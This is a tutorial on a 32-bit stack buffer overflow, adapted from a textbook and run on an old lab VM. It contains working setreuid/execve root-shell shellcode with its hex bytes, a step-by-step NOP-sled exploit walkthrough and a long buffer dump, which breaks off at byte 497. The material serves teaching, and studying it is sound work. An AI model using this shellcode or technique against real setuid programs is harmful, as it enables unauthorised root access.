Date created: Tuesday, December 6, 2016 5:03:19 PM. Last modified: Monday, May 10, 2021 9:27:49 AM
Example 32bit Stack Buffer Overflow Exploit
References:
https://unix.stackexchange.com/questions/66802/disable-stack-protection-on-ubuntu-for-buffer-overflow-without-c-compiler-flags
http://stackoverflow.com/questions/20431174/simple-buffer-overflow-and-shellcode-example
Hacking: The Art of Exploitation 1st Edition (ISBN 1593270070)
Contents
Intro / Background
Stack Based Buffer Overflow Exploit
32bit Exploit Example
64bit Exploit Example
The example below is a modification of the two files "exploit.c" and "vuln.c" from the book Hacking – The Art of Exploitation (1st edition) by Jon Erickson. They have been run on a 32 bit Ubuntu 7.04 virtual machine (with Linux kernel 2.6.20-15 and gcc 3.3.6) downloaded from here: http://www.nostarch.com/hackingCD.htm
Lots of printf statements have been added to show the stack frames in the calling application "exploit-32.c" and the called application "vuln-32.c" which shows how the exploit progresses.
The size of an int, long, pointer etc changes from system to system. An important note is that the demo virtual machine is a 32 bit system and OS, the size of memory addresses are 32 bits and each one addresses a single byte of memory. The exploit-32 and vuln-32 programs are specific about data sizes whereas the original author was more lax on this point. This is important because the 64 bit versions referenced later wouldn't work if the original "imprecise" code was reused on a 64bit machine.
Stack Based Buffer Overflow Exploit
The basic premise of the example stack buffer overflow exploit is as follows; exploit-32 builds an "exploit string" (a 600 byte allocation in memory which amongst other things contains some shell code that is required to run to "pwn" the local system). exploit-32 passes the malicious string as a CLI argument to the vulnerable program vuln-32 that makes an unchecked copy and will try to copy the 600 byte exploit string into a 500 byte stack allocation which leads to the shell code within it the string being executed. vuln-32 is owned by the root user and has the setuid bit set so that users running it execute it as root, this means that the shell code inside the exploit string is run with root privileges when the unchecked copy occurs.
WTF is shellcode?
See the output below; the assembly code first calls Linux syscall 0x46 which is resetuid() to change the real and effective user ID (or the calling user) to 0 (which is root). It then calls Linux syscall 0xb which is execve() with the argument "/bin//sh" which is encoded as HEX to start a shell (the double slash is to ensure the execve string length is a multiple of four bytes so that there are no "empty" bytes in the shellcode which would be written as zero and NULL terminate the exploit string early). This happens under the effective uid of root so it spawns a shell as root. This assembly code is compiled into a binary and then the Intel syntax instructions are dumped to get their hexadecimal values. It is these CPU instructions encoded as hex that form the shell code, code that the CPU is being tricked into running when vuln-32 makes it's unchecked copy and overflows the stack buffer by 100 bytes. For demonstration purposes the ASM program it is run as a normal user an again when it is owned by root with the S bit set.
$ cat exploit-32-shellcode.ask /* asm/unistd.h #define __NR_setreuid 70 */ push 0x46 pop eax xor ebx, ebx xor ecx, ecx int 0x80 xor edx, edx /* asm/unistd.h #define __NR_execve 11 */ push 0xb pop eax push edx /* / b i n / / s h 2f 62 69 6e 2f 2f 73 68 */ push 0x68732f2f push 0x6e69622f mov ebx, esp push edx push ebx mov ecx, esp int 0x80 $ nasm -f elf exploit-32-shellcode.asm $ ld -o exploit-32-shellcode exploit-32-shellcode.o $ objdump -d exploit-32-shellcode exploit-32-shellcode: file format elf32-i386 Disassembly of section .text: 08048060 <.text>: 8048060: 68 46 00 00 00 push $0x46 8048065: 58 pop %eax 8048066: 31 db xor %ebx,%ebx 8048068: 31 c9 xor %ecx,%ecx 804806a: cd 80 int $0x80 804806c: 31 d2 xor %edx,%edx 804806e: 68 0b 00 00 00 push $0xb 8048073: 58 pop %eax 8048074: 52 push %edx 8048075: 68 2f 2f 73 68 push $0x68732f2f 804807a: 68 2f 62 69 6e push $0x6e69622f 804807f: 89 e3 mov %esp,%ebx 8048081: 52 push %edx 8048082: 53 push %ebx 8048083: 89 e1 mov %esp,%ecx 8048085: cd 80 int $0x80 $ ./exploit-32-shellcode sh-3.2$ whoami bensley sh-3.2$ exit exit bensley@htaroe:~/c $ sudo chown root:root exploit-32-shellcode && sudo chmod +s exploit-32-shellcode bensley@htaroe:~/c $ ./exploit-32-shellcode sh-3.2# whoami root sh-3.2# exit exit
The list of steps below detail how the exploit unfolds, the CLI output at the end can be used with the list below as a "follow along":
1. exploit-32 allocates 600 bytes on the heap (at 0x0804a008) and the initial heap address is stored in a pointer called "buffer" ("buffer" is stored on the stack at 0xbffff9fc).
2. The heap allocation is filled with the address of the stack pointer called "buffer" (0xbffff9fc) which is 4 bytes long (32 bit memory addressing remember!) over and over (600 / 4 = 150 times over to be exact).
3. The first 200 bytes of the heap buffer are overwritten with 0x90 which is the Linux syscall for NO-OP, this is to create a NOP sled.
WTF is a NOP sled?
At some point the CPU will be pointed to execute code "somewhere" inside the exploit string when the "bad" copy happens. Exactly where is not known yet. The NOP sled is a list of NO-OP instructions which basically do nothing, "no operation", and the CPU simply moves onto the next instruction in the list. The NOP sled forms a safety net, if the CPU can be tricked into running code stored at an alternate memory location (from where it "should" be executing) the NOP sled means the exact location doesn't have to be known in advance, only roughly. If the CPU can be tricked into reading form the general area where the exploit string is stored it will land somewhere in the NOP sled and "slide" down it to the exploit (it will keep executing each NO-OP instruction moving down the list until it reaches the shellcode).
4. After the two hundred byte NOP sled the shellcode (33 bytes in length) is then written to the heap buffer.
5. Finally the remaining (600 – (200 bytes of NO-OP + 33 bytes of shellcode) 377 bytes of the heap buffer are left containing the address of the pointer called "buffer" (roughly 94 times). The reason for this will become clear later.
6. Next exploit-32 calls vuln-32 and passes the contents of the heap buffer (the exploit string) as a CLI argument to vuln-32.
7. Execution of exploit-32 stops here and it never resumes, after the execl() call the remaining code is never run as execution switches to vuln-32 (execl() changes execution, it doesn't just call a program and resume after that called program finishes execution). At this point the heap buffer malloc()'ed in exploit-32 is destroyed (it should be free()'ed by exploit-32 but that line of code is never run, the OS thankfully cleans up such issues).
8. The virtual-machine is not running ALSR and so reuses memory space from the same region in which it just freed space. This means the CLI arg string which is being passed to vuln-32 is stored in space just freed but closing down the expoit-32 stack frame. In the output see the comment "exploit-32.c &buffer was here, that process is gone now", it can be seen the that the original heap buffer partially overlaps with what is now the space being used to store the string argument to vuln32 (the exploit string built on the heap).
9. vuln-32 is split into main(), which calls copy_wrapper() which in turn calls mem_copy(). This is so that the stack frame for each function can be printed and examined. Also since the exploit takes place when a function call returns so design implementation allows for some additional debugging info to be captured for examples sake (note that each function call passes the ESP address of the parent function, this is just to help with printing the stack frame for debugging purposes and not required for the exploit).
10. main() dumps its stack frame and passes the address of argv[1] to copy_wrapper() (argv[1] being the exploit string).
11. copy_wrapper creates a 500 byte buffer on the stack (which is too small to store the 600 byte argument generated by exploit-32) and prints its stack frame. copy_wrapper() then calls mem_copy() and passes the argv[1] address, the 500 byte stack buffer address and the size of argv[1].
12. mem_copy prints its stack frame and then does the unthinkable and tries to copy the 600 bytes pointed to by argv[1] into the 500 byte stack buffer created in copy_wrapper() (this is why the length of argv[1] is passed by copy_wrapper(), to use a for loop which has no safe guard and will blindly overwrite memory). Since the copy destination buffer is inside the copy_wrapper() stack frame, this overwrites the top of the copy_wrapper() stack frame and into main()'s stack frame (and even a bit beyond main() into "unknown" memory).
13. Because the program flow was main() → copy_wrapper() → mem_copy() and thre has been no "damage" to the mem_copy() stack frame it can return copy_wrapper without issue allowing additional "post copy" debugging info to be printed. This allows for the output below showing the carnage, before trying to return from copy_wrapper() → main(), when program execution flow is lost and the exploit triggered.
14. Back in copy_wrapper() some additional info is printed and then it tries to return to main(). As can be seen in the output below he EIP for main() (stored at 0xbffff78c) has been overwritten be the end of the original exploit string. Recall that the exploit string was 200 bytes of NOP sled, 33 bytes of shellcode and then 377 bytes of a stack address repeated over and over. Thanks to no ASLR in this old Ubuntu VM and the memory reuse, this stack address lands in the NOP sled because the exploit string was copied to the stack to be passed as an argument to vuln-32; in exploit-32 the pointer called buffer was on the stack, it was destroyed by the execl() call to start vuln-32 and the same memory location was reused to store the exploit string and pass it to vuln-32. Now the 200 byte NOP sled has shown its worth.
15. main()'s EIP points into the NOP sled. The NO-OP instructions are executed and the CPU is moving up the instruction list until eventually the shellcode is reached. The rest is history; the uid is changes to 0 and a shall is spawn with uid 0, root.
bensley@htaroe:~/c $ ./exploit-32
Shellcode length: 33
buffer @ 0xbffff9fc = 0x0804a008
buffer[0] @ 0x804a008 = 0x90
buffer[1] @ 0x804a009 = 0x90
buffer[2] @ 0x804a00a = 0x90
buffer[3] @ 0x804a00b = 0x90
buffer[4] @ 0x804a00c = 0x90
buffer[5] @ 0x804a00d = 0x90
buffer[6] @ 0x804a00e = 0x90
buffer[7] @ 0x804a00f = 0x90
buffer[8] @ 0x804a010 = 0x90
buffer[9] @ 0x804a011 = 0x90
buffer[10] @ 0x804a012 = 0x90
buffer[11] @ 0x804a013 = 0x90
buffer[12] @ 0x804a014 = 0x90
buffer[13] @ 0x804a015 = 0x90
buffer[14] @ 0x804a016 = 0x90
buffer[15] @ 0x804a017 = 0x90
buffer[16] @ 0x804a018 = 0x90
buffer[17] @ 0x804a019 = 0x90
buffer[18] @ 0x804a01a = 0x90
buffer[19] @ 0x804a01b = 0x90
buffer[20] @ 0x804a01c = 0x90
buffer[21] @ 0x804a01d = 0x90
buffer[22] @ 0x804a01e = 0x90
buffer[23] @ 0x804a01f = 0x90
buffer[24] @ 0x804a020 = 0x90
buffer[25] @ 0x804a021 = 0x90
buffer[26] @ 0x804a022 = 0x90
buffer[27] @ 0x804a023 = 0x90
buffer[28] @ 0x804a024 = 0x90
buffer[29] @ 0x804a025 = 0x90
buffer[30] @ 0x804a026 = 0x90
buffer[31] @ 0x804a027 = 0x90
buffer[32] @ 0x804a028 = 0x90
buffer[33] @ 0x804a029 = 0x90
buffer[34] @ 0x804a02a = 0x90
buffer[35] @ 0x804a02b = 0x90
buffer[36] @ 0x804a02c = 0x90
buffer[37] @ 0x804a02d = 0x90
buffer[38] @ 0x804a02e = 0x90
buffer[39] @ 0x804a02f = 0x90
buffer[40] @ 0x804a030 = 0x90
buffer[41] @ 0x804a031 = 0x90
buffer[42] @ 0x804a032 = 0x90
buffer[43] @ 0x804a033 = 0x90
buffer[44] @ 0x804a034 = 0x90
buffer[45] @ 0x804a035 = 0x90
buffer[46] @ 0x804a036 = 0x90
buffer[47] @ 0x804a037 = 0x90
buffer[48] @ 0x804a038 = 0x90
buffer[49] @ 0x804a039 = 0x90
buffer[50] @ 0x804a03a = 0x90
buffer[51] @ 0x804a03b = 0x90
buffer[52] @ 0x804a03c = 0x90
buffer[53] @ 0x804a03d = 0x90
buffer[54] @ 0x804a03e = 0x90
buffer[55] @ 0x804a03f = 0x90
buffer[56] @ 0x804a040 = 0x90
buffer[57] @ 0x804a041 = 0x90
buffer[58] @ 0x804a042 = 0x90
buffer[59] @ 0x804a043 = 0x90
buffer[60] @ 0x804a044 = 0x90
buffer[61] @ 0x804a045 = 0x90
buffer[62] @ 0x804a046 = 0x90
buffer[63] @ 0x804a047 = 0x90
buffer[64] @ 0x804a048 = 0x90
buffer[65] @ 0x804a049 = 0x90
buffer[66] @ 0x804a04a = 0x90
buffer[67] @ 0x804a04b = 0x90
buffer[68] @ 0x804a04c = 0x90
buffer[69] @ 0x804a04d = 0x90
buffer[70] @ 0x804a04e = 0x90
buffer[71] @ 0x804a04f = 0x90
buffer[72] @ 0x804a050 = 0x90
buffer[73] @ 0x804a051 = 0x90
buffer[74] @ 0x804a052 = 0x90
buffer[75] @ 0x804a053 = 0x90
buffer[76] @ 0x804a054 = 0x90
buffer[77] @ 0x804a055 = 0x90
buffer[78] @ 0x804a056 = 0x90
buffer[79] @ 0x804a057 = 0x90
buffer[80] @ 0x804a058 = 0x90
buffer[81] @ 0x804a059 = 0x90
buffer[82] @ 0x804a05a = 0x90
buffer[83] @ 0x804a05b = 0x90
buffer[84] @ 0x804a05c = 0x90
buffer[85] @ 0x804a05d = 0x90
buffer[86] @ 0x804a05e = 0x90
buffer[87] @ 0x804a05f = 0x90
buffer[88] @ 0x804a060 = 0x90
buffer[89] @ 0x804a061 = 0x90
buffer[90] @ 0x804a062 = 0x90
buffer[91] @ 0x804a063 = 0x90
buffer[92] @ 0x804a064 = 0x90
buffer[93] @ 0x804a065 = 0x90
buffer[94] @ 0x804a066 = 0x90
buffer[95] @ 0x804a067 = 0x90
buffer[96] @ 0x804a068 = 0x90
buffer[97] @ 0x804a069 = 0x90
buffer[98] @ 0x804a06a = 0x90
buffer[99] @ 0x804a06b = 0x90
buffer[100] @ 0x804a06c = 0x90
buffer[101] @ 0x804a06d = 0x90
buffer[102] @ 0x804a06e = 0x90
buffer[103] @ 0x804a06f = 0x90
buffer[104] @ 0x804a070 = 0x90
buffer[105] @ 0x804a071 = 0x90
buffer[106] @ 0x804a072 = 0x90
buffer[107] @ 0x804a073 = 0x90
buffer[108] @ 0x804a074 = 0x90
buffer[109] @ 0x804a075 = 0x90
buffer[110] @ 0x804a076 = 0x90
buffer[111] @ 0x804a077 = 0x90
buffer[112] @ 0x804a078 = 0x90
buffer[113] @ 0x804a079 = 0x90
buffer[114] @ 0x804a07a = 0x90
buffer[115] @ 0x804a07b = 0x90
buffer[116] @ 0x804a07c = 0x90
buffer[117] @ 0x804a07d = 0x90
buffer[118] @ 0x804a07e = 0x90
buffer[119] @ 0x804a07f = 0x90
buffer[120] @ 0x804a080 = 0x90
buffer[121] @ 0x804a081 = 0x90
buffer[122] @ 0x804a082 = 0x90
buffer[123] @ 0x804a083 = 0x90
buffer[124] @ 0x804a084 = 0x90
buffer[125] @ 0x804a085 = 0x90
buffer[126] @ 0x804a086 = 0x90
buffer[127] @ 0x804a087 = 0x90
buffer[128] @ 0x804a088 = 0x90
buffer[129] @ 0x804a089 = 0x90
buffer[130] @ 0x804a08a = 0x90
buffer[131] @ 0x804a08b = 0x90
buffer[132] @ 0x804a08c = 0x90
buffer[133] @ 0x804a08d = 0x90
buffer[134] @ 0x804a08e = 0x90
buffer[135] @ 0x804a08f = 0x90
buffer[136] @ 0x804a090 = 0x90
buffer[137] @ 0x804a091 = 0x90
buffer[138] @ 0x804a092 = 0x90
buffer[139] @ 0x804a093 = 0x90
buffer[140] @ 0x804a094 = 0x90
buffer[141] @ 0x804a095 = 0x90
buffer[142] @ 0x804a096 = 0x90
buffer[143] @ 0x804a097 = 0x90
buffer[144] @ 0x804a098 = 0x90
buffer[145] @ 0x804a099 = 0x90
buffer[146] @ 0x804a09a = 0x90
buffer[147] @ 0x804a09b = 0x90
buffer[148] @ 0x804a09c = 0x90
buffer[149] @ 0x804a09d = 0x90
buffer[150] @ 0x804a09e = 0x90
buffer[151] @ 0x804a09f = 0x90
buffer[152] @ 0x804a0a0 = 0x90
buffer[153] @ 0x804a0a1 = 0x90
buffer[154] @ 0x804a0a2 = 0x90
buffer[155] @ 0x804a0a3 = 0x90
buffer[156] @ 0x804a0a4 = 0x90
buffer[157] @ 0x804a0a5 = 0x90
buffer[158] @ 0x804a0a6 = 0x90
buffer[159] @ 0x804a0a7 = 0x90
buffer[160] @ 0x804a0a8 = 0x90
buffer[161] @ 0x804a0a9 = 0x90
buffer[162] @ 0x804a0aa = 0x90
buffer[163] @ 0x804a0ab = 0x90
buffer[164] @ 0x804a0ac = 0x90
buffer[165] @ 0x804a0ad = 0x90
buffer[166] @ 0x804a0ae = 0x90
buffer[167] @ 0x804a0af = 0x90
buffer[168] @ 0x804a0b0 = 0x90
buffer[169] @ 0x804a0b1 = 0x90
buffer[170] @ 0x804a0b2 = 0x90
buffer[171] @ 0x804a0b3 = 0x90
buffer[172] @ 0x804a0b4 = 0x90
buffer[173] @ 0x804a0b5 = 0x90
buffer[174] @ 0x804a0b6 = 0x90
buffer[175] @ 0x804a0b7 = 0x90
buffer[176] @ 0x804a0b8 = 0x90
buffer[177] @ 0x804a0b9 = 0x90
buffer[178] @ 0x804a0ba = 0x90
buffer[179] @ 0x804a0bb = 0x90
buffer[180] @ 0x804a0bc = 0x90
buffer[181] @ 0x804a0bd = 0x90
buffer[182] @ 0x804a0be = 0x90
buffer[183] @ 0x804a0bf = 0x90
buffer[184] @ 0x804a0c0 = 0x90
buffer[185] @ 0x804a0c1 = 0x90
buffer[186] @ 0x804a0c2 = 0x90
buffer[187] @ 0x804a0c3 = 0x90
buffer[188] @ 0x804a0c4 = 0x90
buffer[189] @ 0x804a0c5 = 0x90
buffer[190] @ 0x804a0c6 = 0x90
buffer[191] @ 0x804a0c7 = 0x90
buffer[192] @ 0x804a0c8 = 0x90
buffer[193] @ 0x804a0c9 = 0x90
buffer[194] @ 0x804a0ca = 0x90
buffer[195] @ 0x804a0cb = 0x90
buffer[196] @ 0x804a0cc = 0x90
buffer[197] @ 0x804a0cd = 0x90
buffer[198] @ 0x804a0ce = 0x90
buffer[199] @ 0x804a0cf = 0x90
buffer[200] @ 0x804a0d0 = 0x6a
buffer[201] @ 0x804a0d1 = 0x46
buffer[202] @ 0x804a0d2 = 0x58
buffer[203] @ 0x804a0d3 = 0x31
buffer[204] @ 0x804a0d4 = 0xdb
buffer[205] @ 0x804a0d5 = 0x31
buffer[206] @ 0x804a0d6 = 0xc9
buffer[207] @ 0x804a0d7 = 0xcd
buffer[208] @ 0x804a0d8 = 0x80
buffer[209] @ 0x804a0d9 = 0x31
buffer[210] @ 0x804a0da = 0xd2
buffer[211] @ 0x804a0db = 0x6a
buffer[212] @ 0x804a0dc = 0x0b
buffer[213] @ 0x804a0dd = 0x58
buffer[214] @ 0x804a0de = 0x52
buffer[215] @ 0x804a0df = 0x68
buffer[216] @ 0x804a0e0 = 0x2f
buffer[217] @ 0x804a0e1 = 0x2f
buffer[218] @ 0x804a0e2 = 0x73
buffer[219] @ 0x804a0e3 = 0x68
buffer[220] @ 0x804a0e4 = 0x68
buffer[221] @ 0x804a0e5 = 0x2f
buffer[222] @ 0x804a0e6 = 0x62
buffer[223] @ 0x804a0e7 = 0x69
buffer[224] @ 0x804a0e8 = 0x6e
buffer[225] @ 0x804a0e9 = 0x89
buffer[226] @ 0x804a0ea = 0xe3
buffer[227] @ 0x804a0eb = 0x52
buffer[228] @ 0x804a0ec = 0x53
buffer[229] @ 0x804a0ed = 0x89
buffer[230] @ 0x804a0ee = 0xe1
buffer[231] @ 0x804a0ef = 0xcd
buffer[232] @ 0x804a0f0 = 0x80
buffer[233] @ 0x804a0f1 = 0xf9
buffer[234] @ 0x804a0f2 = 0xff
buffer[235] @ 0x804a0f3 = 0xbf
buffer[236] @ 0x804a0f4 = 0xfc
buffer[237] @ 0x804a0f5 = 0xf9
buffer[238] @ 0x804a0f6 = 0xff
buffer[239] @ 0x804a0f7 = 0xbf
buffer[240] @ 0x804a0f8 = 0xfc
buffer[241] @ 0x804a0f9 = 0xf9
buffer[242] @ 0x804a0fa = 0xff
buffer[243] @ 0x804a0fb = 0xbf
buffer[244] @ 0x804a0fc = 0xfc
buffer[245] @ 0x804a0fd = 0xf9
buffer[246] @ 0x804a0fe = 0xff
buffer[247] @ 0x804a0ff = 0xbf
buffer[248] @ 0x804a100 = 0xfc
buffer[249] @ 0x804a101 = 0xf9
buffer[250] @ 0x804a102 = 0xff
buffer[251] @ 0x804a103 = 0xbf
buffer[252] @ 0x804a104 = 0xfc
buffer[253] @ 0x804a105 = 0xf9
buffer[254] @ 0x804a106 = 0xff
buffer[255] @ 0x804a107 = 0xbf
buffer[256] @ 0x804a108 = 0xfc
buffer[257] @ 0x804a109 = 0xf9
buffer[258] @ 0x804a10a = 0xff
buffer[259] @ 0x804a10b = 0xbf
buffer[260] @ 0x804a10c = 0xfc
buffer[261] @ 0x804a10d = 0xf9
buffer[262] @ 0x804a10e = 0xff
buffer[263] @ 0x804a10f = 0xbf
buffer[264] @ 0x804a110 = 0xfc
buffer[265] @ 0x804a111 = 0xf9
buffer[266] @ 0x804a112 = 0xff
buffer[267] @ 0x804a113 = 0xbf
buffer[268] @ 0x804a114 = 0xfc
buffer[269] @ 0x804a115 = 0xf9
buffer[270] @ 0x804a116 = 0xff
buffer[271] @ 0x804a117 = 0xbf
buffer[272] @ 0x804a118 = 0xfc
buffer[273] @ 0x804a119 = 0xf9
buffer[274] @ 0x804a11a = 0xff
buffer[275] @ 0x804a11b = 0xbf
buffer[276] @ 0x804a11c = 0xfc
buffer[277] @ 0x804a11d = 0xf9
buffer[278] @ 0x804a11e = 0xff
buffer[279] @ 0x804a11f = 0xbf
buffer[280] @ 0x804a120 = 0xfc
buffer[281] @ 0x804a121 = 0xf9
buffer[282] @ 0x804a122 = 0xff
buffer[283] @ 0x804a123 = 0xbf
buffer[284] @ 0x804a124 = 0xfc
buffer[285] @ 0x804a125 = 0xf9
buffer[286] @ 0x804a126 = 0xff
buffer[287] @ 0x804a127 = 0xbf
buffer[288] @ 0x804a128 = 0xfc
buffer[289] @ 0x804a129 = 0xf9
buffer[290] @ 0x804a12a = 0xff
buffer[291] @ 0x804a12b = 0xbf
buffer[292] @ 0x804a12c = 0xfc
buffer[293] @ 0x804a12d = 0xf9
buffer[294] @ 0x804a12e = 0xff
buffer[295] @ 0x804a12f = 0xbf
buffer[296] @ 0x804a130 = 0xfc
buffer[297] @ 0x804a131 = 0xf9
buffer[298] @ 0x804a132 = 0xff
buffer[299] @ 0x804a133 = 0xbf
buffer[300] @ 0x804a134 = 0xfc
buffer[301] @ 0x804a135 = 0xf9
buffer[302] @ 0x804a136 = 0xff
buffer[303] @ 0x804a137 = 0xbf
buffer[304] @ 0x804a138 = 0xfc
buffer[305] @ 0x804a139 = 0xf9
buffer[306] @ 0x804a13a = 0xff
buffer[307] @ 0x804a13b = 0xbf
buffer[308] @ 0x804a13c = 0xfc
buffer[309] @ 0x804a13d = 0xf9
buffer[310] @ 0x804a13e = 0xff
buffer[311] @ 0x804a13f = 0xbf
buffer[312] @ 0x804a140 = 0xfc
buffer[313] @ 0x804a141 = 0xf9
buffer[314] @ 0x804a142 = 0xff
buffer[315] @ 0x804a143 = 0xbf
buffer[316] @ 0x804a144 = 0xfc
buffer[317] @ 0x804a145 = 0xf9
buffer[318] @ 0x804a146 = 0xff
buffer[319] @ 0x804a147 = 0xbf
buffer[320] @ 0x804a148 = 0xfc
buffer[321] @ 0x804a149 = 0xf9
buffer[322] @ 0x804a14a = 0xff
buffer[323] @ 0x804a14b = 0xbf
buffer[324] @ 0x804a14c = 0xfc
buffer[325] @ 0x804a14d = 0xf9
buffer[326] @ 0x804a14e = 0xff
buffer[327] @ 0x804a14f = 0xbf
buffer[328] @ 0x804a150 = 0xfc
buffer[329] @ 0x804a151 = 0xf9
buffer[330] @ 0x804a152 = 0xff
buffer[331] @ 0x804a153 = 0xbf
buffer[332] @ 0x804a154 = 0xfc
buffer[333] @ 0x804a155 = 0xf9
buffer[334] @ 0x804a156 = 0xff
buffer[335] @ 0x804a157 = 0xbf
buffer[336] @ 0x804a158 = 0xfc
buffer[337] @ 0x804a159 = 0xf9
buffer[338] @ 0x804a15a = 0xff
buffer[339] @ 0x804a15b = 0xbf
buffer[340] @ 0x804a15c = 0xfc
buffer[341] @ 0x804a15d = 0xf9
buffer[342] @ 0x804a15e = 0xff
buffer[343] @ 0x804a15f = 0xbf
buffer[344] @ 0x804a160 = 0xfc
buffer[345] @ 0x804a161 = 0xf9
buffer[346] @ 0x804a162 = 0xff
buffer[347] @ 0x804a163 = 0xbf
buffer[348] @ 0x804a164 = 0xfc
buffer[349] @ 0x804a165 = 0xf9
buffer[350] @ 0x804a166 = 0xff
buffer[351] @ 0x804a167 = 0xbf
buffer[352] @ 0x804a168 = 0xfc
buffer[353] @ 0x804a169 = 0xf9
buffer[354] @ 0x804a16a = 0xff
buffer[355] @ 0x804a16b = 0xbf
buffer[356] @ 0x804a16c = 0xfc
buffer[357] @ 0x804a16d = 0xf9
buffer[358] @ 0x804a16e = 0xff
buffer[359] @ 0x804a16f = 0xbf
buffer[360] @ 0x804a170 = 0xfc
buffer[361] @ 0x804a171 = 0xf9
buffer[362] @ 0x804a172 = 0xff
buffer[363] @ 0x804a173 = 0xbf
buffer[364] @ 0x804a174 = 0xfc
buffer[365] @ 0x804a175 = 0xf9
buffer[366] @ 0x804a176 = 0xff
buffer[367] @ 0x804a177 = 0xbf
buffer[368] @ 0x804a178 = 0xfc
buffer[369] @ 0x804a179 = 0xf9
buffer[370] @ 0x804a17a = 0xff
buffer[371] @ 0x804a17b = 0xbf
buffer[372] @ 0x804a17c = 0xfc
buffer[373] @ 0x804a17d = 0xf9
buffer[374] @ 0x804a17e = 0xff
buffer[375] @ 0x804a17f = 0xbf
buffer[376] @ 0x804a180 = 0xfc
buffer[377] @ 0x804a181 = 0xf9
buffer[378] @ 0x804a182 = 0xff
buffer[379] @ 0x804a183 = 0xbf
buffer[380] @ 0x804a184 = 0xfc
buffer[381] @ 0x804a185 = 0xf9
buffer[382] @ 0x804a186 = 0xff
buffer[383] @ 0x804a187 = 0xbf
buffer[384] @ 0x804a188 = 0xfc
buffer[385] @ 0x804a189 = 0xf9
buffer[386] @ 0x804a18a = 0xff
buffer[387] @ 0x804a18b = 0xbf
buffer[388] @ 0x804a18c = 0xfc
buffer[389] @ 0x804a18d = 0xf9
buffer[390] @ 0x804a18e = 0xff
buffer[391] @ 0x804a18f = 0xbf
buffer[392] @ 0x804a190 = 0xfc
buffer[393] @ 0x804a191 = 0xf9
buffer[394] @ 0x804a192 = 0xff
buffer[395] @ 0x804a193 = 0xbf
buffer[396] @ 0x804a194 = 0xfc
buffer[397] @ 0x804a195 = 0xf9
buffer[398] @ 0x804a196 = 0xff
buffer[399] @ 0x804a197 = 0xbf
buffer[400] @ 0x804a198 = 0xfc
buffer[401] @ 0x804a199 = 0xf9
buffer[402] @ 0x804a19a = 0xff
buffer[403] @ 0x804a19b = 0xbf
buffer[404] @ 0x804a19c = 0xfc
buffer[405] @ 0x804a19d = 0xf9
buffer[406] @ 0x804a19e = 0xff
buffer[407] @ 0x804a19f = 0xbf
buffer[408] @ 0x804a1a0 = 0xfc
buffer[409] @ 0x804a1a1 = 0xf9
buffer[410] @ 0x804a1a2 = 0xff
buffer[411] @ 0x804a1a3 = 0xbf
buffer[412] @ 0x804a1a4 = 0xfc
buffer[413] @ 0x804a1a5 = 0xf9
buffer[414] @ 0x804a1a6 = 0xff
buffer[415] @ 0x804a1a7 = 0xbf
buffer[416] @ 0x804a1a8 = 0xfc
buffer[417] @ 0x804a1a9 = 0xf9
buffer[418] @ 0x804a1aa = 0xff
buffer[419] @ 0x804a1ab = 0xbf
buffer[420] @ 0x804a1ac = 0xfc
buffer[421] @ 0x804a1ad = 0xf9
buffer[422] @ 0x804a1ae = 0xff
buffer[423] @ 0x804a1af = 0xbf
buffer[424] @ 0x804a1b0 = 0xfc
buffer[425] @ 0x804a1b1 = 0xf9
buffer[426] @ 0x804a1b2 = 0xff
buffer[427] @ 0x804a1b3 = 0xbf
buffer[428] @ 0x804a1b4 = 0xfc
buffer[429] @ 0x804a1b5 = 0xf9
buffer[430] @ 0x804a1b6 = 0xff
buffer[431] @ 0x804a1b7 = 0xbf
buffer[432] @ 0x804a1b8 = 0xfc
buffer[433] @ 0x804a1b9 = 0xf9
buffer[434] @ 0x804a1ba = 0xff
buffer[435] @ 0x804a1bb = 0xbf
buffer[436] @ 0x804a1bc = 0xfc
buffer[437] @ 0x804a1bd = 0xf9
buffer[438] @ 0x804a1be = 0xff
buffer[439] @ 0x804a1bf = 0xbf
buffer[440] @ 0x804a1c0 = 0xfc
buffer[441] @ 0x804a1c1 = 0xf9
buffer[442] @ 0x804a1c2 = 0xff
buffer[443] @ 0x804a1c3 = 0xbf
buffer[444] @ 0x804a1c4 = 0xfc
buffer[445] @ 0x804a1c5 = 0xf9
buffer[446] @ 0x804a1c6 = 0xff
buffer[447] @ 0x804a1c7 = 0xbf
buffer[448] @ 0x804a1c8 = 0xfc
buffer[449] @ 0x804a1c9 = 0xf9
buffer[450] @ 0x804a1ca = 0xff
buffer[451] @ 0x804a1cb = 0xbf
buffer[452] @ 0x804a1cc = 0xfc
buffer[453] @ 0x804a1cd = 0xf9
buffer[454] @ 0x804a1ce = 0xff
buffer[455] @ 0x804a1cf = 0xbf
buffer[456] @ 0x804a1d0 = 0xfc
buffer[457] @ 0x804a1d1 = 0xf9
buffer[458] @ 0x804a1d2 = 0xff
buffer[459] @ 0x804a1d3 = 0xbf
buffer[460] @ 0x804a1d4 = 0xfc
buffer[461] @ 0x804a1d5 = 0xf9
buffer[462] @ 0x804a1d6 = 0xff
buffer[463] @ 0x804a1d7 = 0xbf
buffer[464] @ 0x804a1d8 = 0xfc
buffer[465] @ 0x804a1d9 = 0xf9
buffer[466] @ 0x804a1da = 0xff
buffer[467] @ 0x804a1db = 0xbf
buffer[468] @ 0x804a1dc = 0xfc
buffer[469] @ 0x804a1dd = 0xf9
buffer[470] @ 0x804a1de = 0xff
buffer[471] @ 0x804a1df = 0xbf
buffer[472] @ 0x804a1e0 = 0xfc
buffer[473] @ 0x804a1e1 = 0xf9
buffer[474] @ 0x804a1e2 = 0xff
buffer[475] @ 0x804a1e3 = 0xbf
buffer[476] @ 0x804a1e4 = 0xfc
buffer[477] @ 0x804a1e5 = 0xf9
buffer[478] @ 0x804a1e6 = 0xff
buffer[479] @ 0x804a1e7 = 0xbf
buffer[480] @ 0x804a1e8 = 0xfc
buffer[481] @ 0x804a1e9 = 0xf9
buffer[482] @ 0x804a1ea = 0xff
buffer[483] @ 0x804a1eb = 0xbf
buffer[484] @ 0x804a1ec = 0xfc
buffer[485] @ 0x804a1ed = 0xf9
buffer[486] @ 0x804a1ee = 0xff
buffer[487] @ 0x804a1ef = 0xbf
buffer[488] @ 0x804a1f0 = 0xfc
buffer[489] @ 0x804a1f1 = 0xf9
buffer[490] @ 0x804a1f2 = 0xff
buffer[491] @ 0x804a1f3 = 0xbf
buffer[492] @ 0x804a1f4 = 0xfc
buffer[493] @ 0x804a1f5 = 0xf9
buffer[494] @ 0x804a1f6 = 0xff
buffer[495] @ 0x804a1f7 = 0xbf
buffer[496] @ 0x804a1f8 = 0xfc
buffer[497] @ 0x804a1f9 = 0xf9
